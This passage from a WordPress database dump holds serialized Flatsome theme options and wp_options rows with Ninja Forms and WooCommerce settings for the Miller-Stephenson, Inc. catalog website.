s:11:"top_bar_nav";i:7;}s:10:"backup_log";s:31:"Mon, 15 Aug 2016 23:03:07 +0000";}s:17:"minified_flatsome";i:0;s:16:"flatsome_builder";i:1;s:14:"google_map_api";s:0:"";s:16:"maintenance_mode";i:0;s:21:"maintenance_mode_text";s:24:"Please check back soon..";s:19:"html_scripts_header";s:0:"";s:19:"html_scripts_footer";s:0:"";s:15:"html_custom_css";s:6:"div {}";s:22:"html_custom_css_mobile";s:0:"";s:9:"site_logo";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/mslogo-1-e1471289515793.png";s:0:"";s:188:"Favicon upload has moved to: <br/> <a href=\'https://www.miller-stephenson.com/wp-admin/customize.php?&autofocus%5Bpanel%5Dof-option-logoandicons\'>Appearance > Customize > Site Identity</a>";s:16:"custom_cart_icon";s:0:"";s:14:"site_logo_dark";s:0:"";s:16:"site_logo_sticky";s:0:"";s:11:"body_layout";s:10:"full-width";s:10:"box_shadow";i:0;s:7:"body_bg";s:0:"";s:13:"body_bg_image";s:0:"";s:12:"body_bg_type";s:12:"bg-full-size";s:13:"content_color";s:4:"dark";s:10:"content_bg";s:4:"#FFF";s:13:"header_preset";s:0:"";s:13:"header_height";s:3:"100";s:10:"logo_width";s:3:"234";s:13:"logo_position";s:4:"left";s:10:"search_pos";s:4:"left";s:12:"nav_position";s:3:"top";s:8:"nav_size";s:3:"80%";s:18:"myaccount_dropdown";s:1:"0";s:19:"account_login_style";s:4:"link";s:9:"show_cart";s:1:"0";s:14:"top_right_text";s:74:"[follow facebook=\'#\'\' twitter=\'#\' instagram=\'#\'  googleplus=\'#\' email=\'#\']";s:13:"header_sticky";i:1;s:20:"header_height_sticky";s:2:"70";s:12:"header_color";s:5:"light";s:9:"header_bg";s:5:"#ffff";s:13:"header_bg_img";s:0:"";s:17:"header_bg_img_pos";s:8:"repeat-x";s:11:"topbar_show";i:1;s:9:"topbar_bg";s:0:"";s:11:"topbar_left";s:42:"Add anything here here or just remove it..";s:12:"topbar_right";s:0:"";s:15:"nav_position_bg";s:7:"#0a0a0a";s:18:"nav_position_color";s:11:"dark-header";s:17:"nav_position_text";s:0:"";s:21:"nav_position_text_top";s:0:"";s:17:"html_after_header";s:0:"";s:10:"html_intro";s:0:"";s:16:"footer_left_text";s:71:"Copyright [ux_current_year] © <strong>Miller-Stephenson, Inc.</strong>";s:17:"footer_right_text";s:0:"";s:14:"footer_1_color";s:5:"light";s:17:"footer_1_bg_color";s:4:"#fff";s:17:"footer_1_bg_image";s:0:"";s:16:"footer_1_columns";s:7:"large-3";s:14:"footer_2_color";s:4:"dark";s:17:"footer_2_bg_color";s:4:"#777";s:17:"footer_2_bg_image";s:0:"";s:16:"footer_2_columns";s:7:"large-3";s:19:"footer_bottom_style";s:4:"dark";s:19:"footer_bottom_color";s:4:"#333";s:18:"html_before_footer";s:0:"";s:17:"html_after_footer";s:0:"";s:13:"disable_fonts";i:0;s:13:"type_headings";s:4:"Lato";s:10:"type_texts";s:4:"Lato";s:8:"type_nav";s:4:"Lato";s:8:"type_alt";s:14:"Dancing Script";s:11:"type_subset";a:7:{s:5:"latin";s:1:"1";s:12:"cyrillic-ext";s:1:"0";s:9:"greek-ext";s:1:"0";s:5:"greek";s:1:"0";s:10:"vietnamese";s:1:"0";s:9:"latin-ext";s:1:"0";s:8:"cyrillic";s:1:"0";}s:11:"custom_font";s:0:"";s:13:"color_primary";s:7:"#009bdb";s:15:"color_secondary";s:7:"#d26e4b";s:13:"color_success";s:7:"#7a9c59";s:11:"color_links";s:0:"";s:13:"button_radius";s:3:"0px";s:15:"dropdown_border";s:0:"";s:11:"dropdown_bg";s:0:"";s:13:"dropdown_text";s:5:"light";s:11:"blog_layout";s:13:"right-sidebar";s:10:"blog_style";s:11:"blog-normal";s:18:"blog_archive_title";i:1;s:11:"blog_header";s:1:" ";s:15:"blog_after_post";s:1:" ";s:16:"blog_post_layout";s:13:"right-sidebar";s:15:"blog_post_style";s:7:"default";s:15:"blog_author_box";i:1;s:10:"blog_share";i:0;s:13:"blog_parallax";i:0;s:19:"featured_items_page";i:0;s:22:"featured_items_pr_page";s:2:"12";s:22:"featured_items_related";s:7:"default";s:29:"featured_items_related_height";s:5:"250px";s:16:"wc_account_links";i:1;s:14:"facebook_login";i:0;s:17:"facebook_login_bg";s:0:"";s:14:"color_checkout";s:0:"";s:10:"color_sale";s:0:"";s:16:"color_new_bubble";s:7:"#7a9c59";s:12:"color_review";s:0:"";s:15:"product_sidebar";s:10:"no_sidebar";s:25:"product_offcanvas_sidebar";s:1:"0";s:15:"product_display";s:4:"tabs";s:18:"cart_dropdown_show";s:1:"1";s:16:"shop_aside_title";s:17:"complete the look";s:12:"product_zoom";s:1:"0";s:16:"related_products";s:6:"slider";s:23:"related_products_pr_row";s:1:"4";s:20:"max_related_products";s:2:"12";s:15:"disable_reviews";s:1:"0";s:9:"tab_title";s:0:"";s:11:"tab_content";s:0:"";s:23:"html_before_add_to_cart";s:1:" ";s:22:"html_after_add_to_cart";s:0:"";s:14:"html_shop_page";s:0:"";s:16:"category_sidebar";s:12:"left-sidebar";s:10:"grid_style";s:5:"grid1";s:10:"grid_frame";s:6:"normal";s:12:"masonry_grid";s:1:"0";s:16:"add_to_cart_icon";s:7:"disable";s:25:"short_description_in_grid";s:1:"0";s:9:"cat_style";s:10:"text-badge";s:15:"breadcrumb_size";s:17:"breadcrumb-normal";s:15:"breadcrumb_home";s:1:"1";s:18:"category_row_count";s:1:"3";s:25:"category_row_count_mobile";s:1:"2";s:16:"products_pr_page";s:2:"12";s:13:"search_result";s:1:"0";s:13:"product_hover";s:12:"fade_in_back";s:12:"bubble_style";s:6:"style1";s:22:"sale_bubble_percentage";s:1:"0";s:18:"disable_quick_view";s:1:"0";s:13:"wishlist_icon";s:5:"heart";s:15:"coupon_checkout";s:1:"0";s:17:"continue_shopping";s:1:"0";s:16:"html_cart_footer";s:0:"";s:21:"html_checkout_sidebar";s:0:"";s:14:"html_thank_you";s:0:"";s:12:"catalog_mode";s:1:"1";s:19:"catalog_mode_prices";s:1:"1";s:19:"catalog_mode_header";s:0:"";s:20:"catalog_mode_product";s:0:"";s:21:"catalog_mode_lightbox";s:0:"";s:19:"facebook_login_text";s:0:"";s:23:"facebook_login_checkout";s:1:"0";s:18:"custom_share_icons";s:0:"";s:18:"nav_menu_locations";a:3:{s:7:"primary";i:6;s:14:"primary_mobile";i:6;s:11:"top_bar_nav";i:7;}s:10:"backup_log";s:31:"Mon, 15 Aug 2016 23:03:59 +0000";}s:17:"minified_flatsome";s:1:"1";s:16:"flatsome_builder";i:1;s:14:"google_map_api";s:0:"";s:16:"maintenance_mode";i:0;s:21:"maintenance_mode_text";s:24:"Please check back soon..";s:19:"html_scripts_header";s:0:"";s:19:"html_scripts_footer";s:0:"";s:15:"html_custom_css";s:6:"div {}";s:22:"html_custom_css_mobile";s:0:"";s:9:"site_logo";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/mslogo-1-e1471289515793.png";s:0:"";s:188:"Favicon upload has moved to: <br/> <a href=\'https://www.miller-stephenson.com/wp-admin/customize.php?&autofocus%5Bpanel%5Dof-option-logoandicons\'>Appearance > Customize > Site Identity</a>";s:16:"custom_cart_icon";s:0:"";s:14:"site_logo_dark";s:0:"";s:16:"site_logo_sticky";s:0:"";s:11:"body_layout";s:10:"full-width";s:10:"box_shadow";s:1:"1";s:7:"body_bg";s:7:"#ffffff";s:13:"body_bg_image";s:0:"";s:12:"body_bg_type";s:12:"bg-full-size";s:13:"content_color";s:5:"light";s:10:"content_bg";s:7:"#ffffff";s:13:"header_preset";s:0:"";s:13:"header_height";s:3:"100";s:10:"logo_width";s:3:"234";s:13:"logo_position";s:4:"left";s:10:"search_pos";s:4:"left";s:12:"nav_position";s:3:"top";s:8:"nav_size";s:4:"100%";s:18:"myaccount_dropdown";s:1:"0";s:19:"account_login_style";s:4:"link";s:9:"show_cart";s:1:"0";s:14:"top_right_text";s:61:"[follow facebook=\'#\'\' twitter=\'#\'   googleplus=\'#\' email=\'#\']";s:13:"header_sticky";i:1;s:20:"header_height_sticky";s:2:"70";s:12:"header_color";s:5:"light";s:9:"header_bg";s:5:"#ffff";s:13:"header_bg_img";s:0:"";s:17:"header_bg_img_pos";s:8:"repeat-x";s:11:"topbar_show";i:1;s:9:"topbar_bg";s:7:"#002c56";s:11:"topbar_left";s:23:"Toll Free: 800-442-3424";s:12:"topbar_right";s:0:"";s:15:"nav_position_bg";s:7:"#0a0a0a";s:18:"nav_position_color";s:11:"dark-header";s:17:"nav_position_text";s:0:"";s:21:"nav_position_text_top";s:0:"";s:17:"html_after_header";s:0:"";s:10:"html_intro";s:0:"";s:16:"footer_left_text";s:71:"Copyright [ux_current_year] © <strong>Miller-Stephenson, Inc.</strong>";s:17:"footer_right_text";s:0:"";s:14:"footer_1_color";s:4:"dark";s:17:"footer_1_bg_color";s:7:"#002c56";s:17:"footer_1_bg_image";s:0:"";s:16:"footer_1_columns";s:7:"large-3";s:14:"footer_2_color";s:4:"dark";s:17:"footer_2_bg_color";s:4:"#777";s:17:"footer_2_bg_image";s:0:"";s:16:"footer_2_columns";s:7:"large-3";s:19:"footer_bottom_style";s:4:"dark";s:19:"footer_bottom_color";s:4:"#333";s:18:"html_before_footer";s:0:"";s:17:"html_after_footer";s:0:"";s:13:"disable_fonts";i:0;s:13:"type_headings";s:4:"Lato";s:10:"type_texts";s:4:"Lato";s:8:"type_nav";s:4:"Lato";s:8:"type_alt";s:14:"Dancing Script";s:11:"type_subset";a:7:{s:5:"latin";s:1:"1";s:12:"cyrillic-ext";s:1:"0";s:9:"greek-ext";s:1:"0";s:5:"greek";s:1:"0";s:10:"vietnamese";s:1:"0";s:9:"latin-ext";s:1:"0";s:8:"cyrillic";s:1:"0";}s:11:"custom_font";s:0:"";s:13:"color_primary";s:7:"#009bdb";s:15:"color_secondary";s:7:"#822c43";s:13:"color_success";s:7:"#7a9c59";s:11:"color_links";s:0:"";s:13:"button_radius";s:3:"0px";s:15:"dropdown_border";s:0:"";s:11:"dropdown_bg";s:0:"";s:13:"dropdown_text";s:5:"light";s:11:"blog_layout";s:13:"right-sidebar";s:10:"blog_style";s:11:"blog-normal";s:18:"blog_archive_title";i:1;s:11:"blog_header";s:1:" ";s:15:"blog_after_post";s:1:" ";s:16:"blog_post_layout";s:13:"right-sidebar";s:15:"blog_post_style";s:7:"default";s:15:"blog_author_box";i:1;s:10:"blog_share";i:0;s:13:"blog_parallax";i:0;s:19:"featured_items_page";i:0;s:22:"featured_items_pr_page";s:2:"12";s:22:"featured_items_related";s:7:"default";s:29:"featured_items_related_height";s:5:"250px";s:16:"wc_account_links";i:1;s:14:"facebook_login";i:0;s:17:"facebook_login_bg";s:0:"";s:14:"color_checkout";s:0:"";s:10:"color_sale";s:0:"";s:16:"color_new_bubble";s:7:"#7a9c59";s:12:"color_review";s:0:"";s:15:"product_sidebar";s:10:"full_width";s:25:"product_offcanvas_sidebar";s:1:"0";s:15:"product_display";s:8:"sections";s:18:"cart_dropdown_show";s:1:"0";s:16:"shop_aside_title";s:17:"complete the look";s:12:"product_zoom";s:1:"1";s:16:"related_products";s:6:"hidden";s:23:"related_products_pr_row";s:1:"4";s:20:"max_related_products";s:2:"12";s:15:"disable_reviews";s:1:"1";s:9:"tab_title";s:0:"";s:11:"tab_content";s:0:"";s:23:"html_before_add_to_cart";s:1:" ";s:22:"html_after_add_to_cart";s:0:"";s:14:"html_shop_page";s:0:"";s:16:"category_sidebar";s:12:"left-sidebar";s:10:"grid_style";s:5:"grid1";s:10:"grid_frame";s:5:"frame";s:12:"masonry_grid";s:1:"0";s:16:"add_to_cart_icon";s:7:"disable";s:25:"short_description_in_grid";s:1:"0";s:9:"cat_style";s:11:"text-normal";s:15:"breadcrumb_size";s:17:"breadcrumb-normal";s:15:"breadcrumb_home";s:1:"0";s:18:"category_row_count";s:1:"6";s:25:"category_row_count_mobile";s:1:"2";s:16:"products_pr_page";s:2:"24";s:13:"search_result";s:1:"0";s:13:"product_hover";s:7:"zoom_in";s:12:"bubble_style";s:6:"style1";s:22:"sale_bubble_percentage";s:1:"0";s:18:"disable_quick_view";s:1:"0";s:13:"wishlist_icon";s:4:"list";s:15:"coupon_checkout";s:1:"0";s:17:"continue_shopping";s:1:"0";s:16:"html_cart_footer";s:0:"";s:21:"html_checkout_sidebar";s:0:"";s:14:"html_thank_you";s:0:"";s:12:"catalog_mode";s:1:"1";s:19:"catalog_mode_prices";s:1:"1";s:19:"catalog_mode_header";s:0:"";s:20:"catalog_mode_product";s:0:"";s:21:"catalog_mode_lightbox";s:0:"";s:19:"facebook_login_text";s:0:"";s:23:"facebook_login_checkout";s:1:"0";s:18:"custom_share_icons";s:0:"";s:18:"nav_menu_locations";a:3:{s:7:"primary";i:6;s:14:"primary_mobile";i:6;s:11:"top_bar_nav";i:7;}s:10:"backup_log";s:31:"Wed, 17 Aug 2016 02:02:21 +0000";}s:9:"smof_init";s:31:"Mon, 15 Aug 2016 19:07:11 +0000";s:17:"minified_flatsome";s:1:"1";s:16:"flatsome_builder";i:1;s:14:"google_map_api";s:0:"";s:16:"maintenance_mode";i:0;s:21:"maintenance_mode_text";s:24:"Please check back soon..";s:19:"html_scripts_header";s:0:"";s:19:"html_scripts_footer";s:0:"";s:15:"html_custom_css";s:6:"div {}";s:22:"html_custom_css_mobile";s:0:"";s:9:"site_logo";s:65:"[site_url]/wp-content/uploads/2016/08/mslogo-1-e1471289515793.png";s:0:"";s:165:"Favicon upload has moved to: <br/> <a href=\'[site_url]/wp-admin/customize.php?&autofocus%5Bpanel%5Dof-option-logoandicons\'>Appearance > Customize > Site Identity</a>";s:16:"custom_cart_icon";s:0:"";s:14:"site_logo_dark";s:0:"";s:16:"site_logo_sticky";s:0:"";s:11:"body_layout";s:10:"full-width";s:10:"box_shadow";s:1:"1";s:7:"body_bg";s:7:"#ffffff";s:13:"body_bg_image";s:0:"";s:12:"body_bg_type";s:12:"bg-full-size";s:13:"content_color";s:5:"light";s:10:"content_bg";s:7:"#ffffff";s:13:"header_preset";s:0:"";s:13:"header_height";s:3:"100";s:10:"logo_width";s:3:"181";s:13:"logo_position";s:4:"left";s:10:"search_pos";s:4:"hide";s:12:"nav_position";s:3:"top";s:8:"nav_size";s:4:"100%";s:18:"myaccount_dropdown";s:1:"0";s:19:"account_login_style";s:8:"lightbox";s:9:"show_cart";s:1:"0";s:14:"top_right_text";s:8:"[search]";s:13:"header_sticky";i:1;s:20:"header_height_sticky";s:2:"70";s:12:"header_color";s:5:"light";s:9:"header_bg";s:5:"#ffff";s:13:"header_bg_img";s:0:"";s:17:"header_bg_img_pos";s:8:"repeat-x";s:11:"topbar_show";i:1;s:9:"topbar_bg";s:7:"#002c56";s:11:"topbar_left";s:23:"Toll Free: 800-442-3424";s:12:"topbar_right";s:0:"";s:15:"nav_position_bg";s:7:"#0a0a0a";s:18:"nav_position_color";s:11:"dark-header";s:17:"nav_position_text";s:0:"";s:21:"nav_position_text_top";s:0:"";s:17:"html_after_header";s:0:"";s:10:"html_intro";s:0:"";s:16:"footer_left_text";s:71:"Copyright [ux_current_year] © <strong>Miller-Stephenson, Inc.</strong>";s:17:"footer_right_text";s:0:"";s:14:"footer_1_color";s:4:"dark";s:17:"footer_1_bg_color";s:7:"#002c56";s:17:"footer_1_bg_image";s:0:"";s:16:"footer_1_columns";s:7:"large-3";s:14:"footer_2_color";s:4:"dark";s:17:"footer_2_bg_color";s:4:"#777";s:17:"footer_2_bg_image";s:0:"";s:16:"footer_2_columns";s:7:"large-3";s:19:"footer_bottom_style";s:4:"dark";s:19:"footer_bottom_color";s:4:"#333";s:18:"html_before_footer";s:0:"";s:17:"html_after_footer";s:0:"";s:13:"disable_fonts";i:0;s:13:"type_headings";s:4:"Lato";s:10:"type_texts";s:4:"Lato";s:8:"type_nav";s:4:"Lato";s:8:"type_alt";s:7:"Flavors";s:11:"type_subset";a:7:{s:5:"latin";s:1:"1";s:12:"cyrillic-ext";s:1:"0";s:9:"greek-ext";s:1:"0";s:5:"greek";s:1:"0";s:10:"vietnamese";s:1:"0";s:9:"latin-ext";s:1:"0";s:8:"cyrillic";s:1:"0";}s:11:"custom_font";s:0:"";s:13:"color_primary";s:7:"#009bdb";s:15:"color_secondary";s:7:"#000000";s:13:"color_success";s:7:"#dd3333";s:11:"color_links";s:0:"";s:13:"button_radius";s:3:"0px";s:15:"dropdown_border";s:0:"";s:11:"dropdown_bg";s:0:"";s:13:"dropdown_text";s:5:"light";s:11:"blog_layout";s:13:"right-sidebar";s:10:"blog_style";s:11:"blog-normal";s:18:"blog_archive_title";i:1;s:11:"blog_header";s:1:" ";s:15:"blog_after_post";s:1:" ";s:16:"blog_post_layout";s:13:"right-sidebar";s:15:"blog_post_style";s:7:"default";s:15:"blog_author_box";i:1;s:10:"blog_share";i:0;s:13:"blog_parallax";i:0;s:19:"featured_items_page";i:0;s:22:"featured_items_pr_page";s:2:"12";s:22:"featured_items_related";s:7:"default";s:29:"featured_items_related_height";s:5:"250px";s:16:"wc_account_links";i:1;s:14:"facebook_login";i:0;s:17:"facebook_login_bg";s:0:"";s:14:"color_checkout";s:0:"";s:10:"color_sale";s:0:"";s:16:"color_new_bubble";s:7:"#dd3333";s:12:"color_review";s:0:"";s:15:"product_sidebar";s:10:"no_sidebar";s:25:"product_offcanvas_sidebar";s:1:"1";s:15:"product_display";s:13:"tabs_vertical";s:18:"cart_dropdown_show";s:1:"0";s:16:"shop_aside_title";s:0:"";s:12:"product_zoom";s:1:"1";s:16:"related_products";s:6:"hidden";s:23:"related_products_pr_row";s:1:"4";s:20:"max_related_products";s:2:"12";s:15:"disable_reviews";s:1:"1";s:9:"tab_title";s:0:"";s:11:"tab_content";s:0:"";s:23:"html_before_add_to_cart";s:74:" <font color="red">CALL: <strong>800-442-3424</strong>  FOR PRICING</font>";s:22:"html_after_add_to_cart";s:0:"";s:14:"html_shop_page";s:0:"";s:16:"category_sidebar";s:12:"left-sidebar";s:10:"grid_style";s:5:"grid1";s:10:"grid_frame";s:5:"boxed";s:12:"masonry_grid";s:1:"0";s:16:"add_to_cart_icon";s:7:"disable";s:25:"short_description_in_grid";s:1:"0";s:9:"cat_style";s:11:"text-normal";s:15:"breadcrumb_size";s:16:"breadcrumb-small";s:15:"breadcrumb_home";s:1:"1";s:18:"category_row_count";s:1:"6";s:25:"category_row_count_mobile";s:1:"2";s:16:"products_pr_page";s:2:"24";s:13:"search_result";s:1:"0";s:13:"product_hover";s:7:"zoom_in";s:12:"bubble_style";s:6:"style1";s:22:"sale_bubble_percentage";s:1:"0";s:18:"disable_quick_view";s:1:"0";s:13:"wishlist_icon";s:4:"star";s:15:"coupon_checkout";s:1:"0";s:17:"continue_shopping";s:1:"0";s:16:"html_cart_footer";s:0:"";s:21:"html_checkout_sidebar";s:0:"";s:14:"html_thank_you";s:0:"";s:12:"catalog_mode";s:1:"1";s:19:"catalog_mode_prices";s:1:"1";s:19:"catalog_mode_header";s:0:"";s:20:"catalog_mode_product";s:0:"";s:21:"catalog_mode_lightbox";s:0:"";s:19:"facebook_login_text";s:0:"";s:23:"facebook_login_checkout";s:1:"0";s:18:"custom_share_icons";s:0:"";s:18:"nav_menu_locations";a:3:{s:7:"primary";i:6;s:14:"primary_mobile";i:6;s:11:"top_bar_nav";i:7;}s:16:"sidebars_widgets";a:2:{s:4:"time";i:1473545002;s:4:"data";a:8:{s:19:"wp_inactive_widgets";a:0:{}s:13:"products-page";a:2:{i:0;s:22:"woocommerce_products-2";i:1;s:22:"wpadm_counter_widget-2";}i:563;a:0:{}s:12:"sidebar-main";a:1:{i:0;s:32:"woocommerce_product_categories-9";}s:12:"shop-sidebar";a:1:{i:0;s:32:"woocommerce_product_categories-5";}s:15:"product-sidebar";a:1:{i:0;s:32:"woocommerce_product_categories-8";}s:16:"sidebar-footer-1";a:4:{i:0;s:10:"nav_menu-2";i:1;s:6:"text-2";i:2;s:6:"text-3";i:3;s:32:"woocommerce_product_categories-7";}s:16:"sidebar-footer-2";a:0:{}}}}', 'yes'); 
INSERT INTO `wp_options` VALUES (150, 'ninja_forms_load_deprecated', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (152, 'nf_convert_notifications_complete', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (153, 'nf_convert_subs_step', 'complete', 'yes'); 
INSERT INTO `wp_options` VALUES (154, 'nf_upgrade_notice', 'closed', 'yes'); 
INSERT INTO `wp_options` VALUES (155, 'nf_update_email_settings_complete', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (156, 'nf_email_fav_updated', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (157, 'nf_convert_forms_complete', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (158, 'nf_database_migrations', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (159, 'ninja_forms_settings', 'a:19:{s:11:"date_format";s:5:"d/m/Y";s:15:"currency_symbol";s:1:"$";s:14:"recaptcha_lang";s:2:"en";s:13:"req_div_label";s:80:"Fields marked with an <span class="ninja-forms-req-symbol">*</span> are required";s:16:"req_field_symbol";s:18:"<strong>*</strong>";s:15:"req_error_label";s:48:"Please ensure all required fields are completed.";s:15:"req_field_error";s:24:"This is a required field";s:10:"spam_error";s:47:"Please answer the anti-spam question correctly.";s:14:"honeypot_error";s:34:"Please leave the spam field blank.";s:18:"timed_submit_error";s:31:"Please wait to submit the form.";s:16:"javascript_error";s:54:"You cannot submit the form without Javascript enabled.";s:13:"invalid_email";s:35:"Please enter a valid email address.";s:13:"process_label";s:10:"Processing";s:17:"password_mismatch";s:36:"The passwords provided do not match.";s:10:"preview_id";i:4;s:7:"version";s:5:"3.1.9";s:19:"fix_form_email_from";i:1;s:18:"fix_field_reply_to";i:1;s:22:"version_2_2_25_rte_fix";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (160, 'ninja_forms_version', '2.9.55.2', 'yes'); 
INSERT INTO `wp_options` VALUES (165, 'woosidebars-version', '1.4.3', 'yes'); 
INSERT INTO `wp_options` VALUES (166, 'woocommerce_default_country', 'US:CT', 'yes'); 
INSERT INTO `wp_options` VALUES (167, 'woocommerce_allowed_countries', 'all', 'yes'); 
INSERT INTO `wp_options` VALUES (168, 'woocommerce_all_except_countries', '', 'yes'); 
INSERT INTO `wp_options` VALUES (169, 'woocommerce_specific_allowed_countries', '', 'yes'); 
INSERT INTO `wp_options` VALUES (170, 'woocommerce_ship_to_countries', 'disabled', 'yes'); 
INSERT INTO `wp_options` VALUES (171, 'woocommerce_specific_ship_to_countries', '', 'yes'); 
INSERT INTO `wp_options` VALUES (172, 'woocommerce_default_customer_address', 'geolocation', 'yes'); 
INSERT INTO `wp_options` VALUES (173, 'woocommerce_calc_taxes', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (174, 'woocommerce_demo_store', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (175, 'woocommerce_demo_store_notice', 'This is a demo store for testing purposes &mdash; no orders shall be fulfilled.', 'no'); 
INSERT INTO `wp_options` VALUES (176, 'woocommerce_currency', 'USD', 'yes'); 
INSERT INTO `wp_options` VALUES (177, 'woocommerce_currency_pos', 'left', 'yes'); 
INSERT INTO `wp_options` VALUES (178, 'woocommerce_price_thousand_sep', ',', 'yes'); 
INSERT INTO `wp_options` VALUES (179, 'woocommerce_price_decimal_sep', '.', 'yes'); 
INSERT INTO `wp_options` VALUES (180, 'woocommerce_price_num_decimals', '2', 'yes'); 
INSERT INTO `wp_options` VALUES (181, 'woocommerce_weight_unit', 'lbs', 'yes'); 
INSERT INTO `wp_options` VALUES (182, 'woocommerce_dimension_unit', 'in', 'yes'); 
INSERT INTO `wp_options` VALUES (183, 'woocommerce_enable_review_rating', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (184, 'woocommerce_review_rating_required', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (185, 'woocommerce_review_rating_verification_label', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (186, 'woocommerce_review_rating_verification_required', 'no', 'no'); 
INSERT INTO `wp_options` VALUES (187, 'woocommerce_shop_page_id', '19', 'yes'); 
INSERT INTO `wp_options` VALUES (188, 'woocommerce_shop_page_display', '', 'yes'); 
INSERT INTO `wp_options` VALUES (189, 'woocommerce_category_archive_display', 'subcategories', 'yes'); 
INSERT INTO `wp_options` VALUES (190, 'woocommerce_default_catalog_orderby', 'menu_order', 'yes'); 
INSERT INTO `wp_options` VALUES (191, 'woocommerce_cart_redirect_after_add', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (192, 'woocommerce_enable_ajax_add_to_cart', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (193, 'shop_catalog_image_size', 'a:3:{s:5:"width";s:3:"225";s:6:"height";s:3:"225";s:4:"crop";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (194, 'shop_single_image_size', 'a:3:{s:5:"width";s:3:"510";s:6:"height";s:3:"600";s:4:"crop";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (195, 'shop_thumbnail_image_size', 'a:3:{s:5:"width";s:3:"200";s:6:"height";s:3:"200";s:4:"crop";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (196, 'woocommerce_enable_lightbox', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (197, 'woocommerce_manage_stock', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (198, 'woocommerce_hold_stock_minutes', '60', 'no'); 
INSERT INTO `wp_options` VALUES (199, 'woocommerce_notify_low_stock', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (200, 'woocommerce_notify_no_stock', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (201, 'woocommerce_stock_email_recipient', 'ddillulio@mschem.com', 'no'); 
INSERT INTO `wp_options` VALUES (202, 'woocommerce_notify_low_stock_amount', '2', 'no'); 
INSERT INTO `wp_options` VALUES (203, 'woocommerce_notify_no_stock_amount', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (204, 'woocommerce_hide_out_of_stock_items', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (205, 'woocommerce_stock_format', '', 'yes'); 
INSERT INTO `wp_options` VALUES (206, 'woocommerce_file_download_method', 'force', 'no'); 
INSERT INTO `wp_options` VALUES (207, 'woocommerce_downloads_require_login', 'no', 'no'); 
INSERT INTO `wp_options` VALUES (208, 'woocommerce_downloads_grant_access_after_payment', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (209, 'woocommerce_prices_include_tax', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (210, 'woocommerce_tax_based_on', 'shipping', 'yes'); 
INSERT INTO `wp_options` VALUES (211, 'woocommerce_shipping_tax_class', '', 'yes'); 
INSERT INTO `wp_options` VALUES (212, 'woocommerce_tax_round_at_subtotal', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (213, 'woocommerce_tax_classes', 'Reduced Rate\r\nZero Rate', 'yes'); 
INSERT INTO `wp_options` VALUES (214, 'woocommerce_tax_display_shop', 'excl', 'yes'); 
INSERT INTO `wp_options` VALUES (215, 'woocommerce_tax_display_cart', 'excl', 'no'); 
INSERT INTO `wp_options` VALUES (216, 'woocommerce_price_display_suffix', '', 'yes'); 
INSERT INTO `wp_options` VALUES (217, 'woocommerce_tax_total_display', 'itemized', 'no'); 
INSERT INTO `wp_options` VALUES (218, 'woocommerce_enable_shipping_calc', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (219, 'woocommerce_shipping_cost_requires_address', 'no', 'no'); 
INSERT INTO `wp_options` VALUES (220, 'woocommerce_ship_to_destination', 'billing', 'no'); 
INSERT INTO `wp_options` VALUES (221, 'woocommerce_enable_coupons', 'yes', 'yes'); 
INSERT INTO `wp_options` VALUES (222, 'woocommerce_calc_discounts_sequentially', 'no', 'no'); 
INSERT INTO `wp_options` VALUES (223, 'woocommerce_enable_guest_checkout', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (224, 'woocommerce_force_ssl_checkout', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (225, 'woocommerce_unforce_ssl_checkout', 'no', 'yes'); 
INSERT INTO `wp_options` VALUES (226, 'woocommerce_cart_page_id', '20', 'yes'); 
INSERT INTO `wp_options` VALUES (227, 'woocommerce_checkout_page_id', '21', 'yes'); 
INSERT INTO `wp_options` VALUES (228, 'woocommerce_terms_page_id', '', 'no'); 
INSERT INTO `wp_options` VALUES (229, 'woocommerce_checkout_pay_endpoint', 'order-pay', 'yes'); 
INSERT INTO `wp_options` VALUES (230, 'woocommerce_checkout_order_received_endpoint', 'order-received', 'yes'); 
INSERT INTO `wp_options` VALUES (231, 'woocommerce_myaccount_add_payment_method_endpoint', 'add-payment-method', 'yes'); 
INSERT INTO `wp_options` VALUES (232, 'widget_ninja_forms_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (233, 'woocommerce_myaccount_delete_payment_method_endpoint', 'delete-payment-method', 'yes'); 
INSERT INTO `wp_options` VALUES (234, 'widget_null-instagram-feed', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (235, 'woocommerce_myaccount_set_default_payment_method_endpoint', 'set-default-payment-method', 'yes'); 
INSERT INTO `wp_options` VALUES (237, 'woocommerce_myaccount_page_id', '22', 'yes'); 
INSERT INTO `wp_options` VALUES (238, 'woocommerce_enable_signup_and_login_from_checkout', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (239, 'woocommerce_enable_myaccount_registration', 'yes', 'no'); 
INSERT INTO `wp_options` VALUES (240, 'woocommerce_enable_checkout_login_reminder', 'yes', 'no'); 
